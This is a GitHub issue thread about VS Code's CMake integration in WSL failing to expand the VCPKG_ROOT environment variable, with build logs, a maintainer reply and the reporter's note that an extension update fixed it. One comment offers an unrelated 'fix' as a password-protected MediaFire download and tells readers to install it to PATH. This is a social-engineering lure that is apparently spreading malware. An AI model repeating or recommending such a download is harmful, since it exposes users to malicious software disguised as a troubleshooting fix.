### ISSUE TITLE
"$env{VCPKG_ROOT}/scripts/buildsystems/vcpkg.cmake" not picking up VCPKG_ROOT from bask environment variable.

### ISSUE THREAD

**Issue by rohit-singh-gautam** [microsoft/vscode#227270]
Does this issue occur when all extensions are disabled?: No - CMake extension is required.

- VS Code Version: 1.92.2
- OS Version:  WSL Ubuntu 24.04 LTS
Version: 1.92.2 (user setup)
Commit: fee1edb8d6d72a0ddff41e5f71a671c23ed924b9
Date: 2024-08-14T17:29:30.058Z
Electron: 30.1.2
ElectronBuildId: 9870757
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.22631

Steps to Reproduce:

1. Install WSL 2, Ubuntu 24.04 and Visual Studio Code on Windows 11
2. Install VCPkg and setup environment variable VCPKG_ROOT in WSL .bashrc. run vcpkg integrate install, vcpkg integrate bash.
3. Clone and start Visual Studio code for https://github.com/rohit-singh-gautam/JSON

It fails with error below error:
[main] Building folder: /home/rohit/src/JSON/out/build/Debug 
[main] Configuring project: JSON 
[proc] Executing command: /usr/bin/cmake -DCMAKE_BUILD_TYPE=Debug -DVCPKG_TARGET_TRIPLET=x64-linux -DCMAKE_TOOLCHAIN_FILE=/scripts/buildsystems/vcpkg.cmake -DCMAKE_INSTALL_PREFIX=/home/rohit/src/JSON/out/install/Debug -S/home/rohit/src/JSON -B/home/rohit/src/JSON/out/build/Debug
[cmake] CMake Error at /usr/share/cmake-3.28/Modules/CMakeDetermineSystem.cmake:176 (message):
[cmake]   Could not find toolchain file: /scripts/buildsystems/vcpkg.cmake
[cmake] Call Stack (most recent call first):
[cmake]   CMakeLists.txt:3 (project)
[cmake] 
[cmake] 
[cmake] CMake Error: CMake was unable to find a build program corresponding to "Unix Makefiles".  CMAKE_MAKE_PROGRAM is not set.  You probably need to select a different build tool.
[cmake] CMake Error: CMAKE_C_COMPILER not set, after EnableLanguage
[cmake] CMake Error: CMAKE_CXX_COMPILER not set, after EnableLanguage
[cmake] -- Configuring incomplete, errors occurred!
[proc] The command: /usr/bin/cmake -DCMAKE_BUILD_TYPE=Debug -DVCPKG_TARGET_TRIPLET=x64-linux -DCMAKE_TOOLCHAIN_FILE=/scripts/buildsystems/vcpkg.cmake -DCMAKE_INSTALL_PREFIX=/home/rohit/src/JSON/out/install/Debug -S/home/rohit/src/JSON -B/home/rohit/src/JSON/out/build/Debug exited with code: 1

Disabling extension does not runs CMake.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by roblourens** [comment]
I take it you're using an extension to run a cmake build task? You can file an issue on the extension

**Comment by rohit-singh-gautam** [comment]
This seems to be fixed with latest extension update.
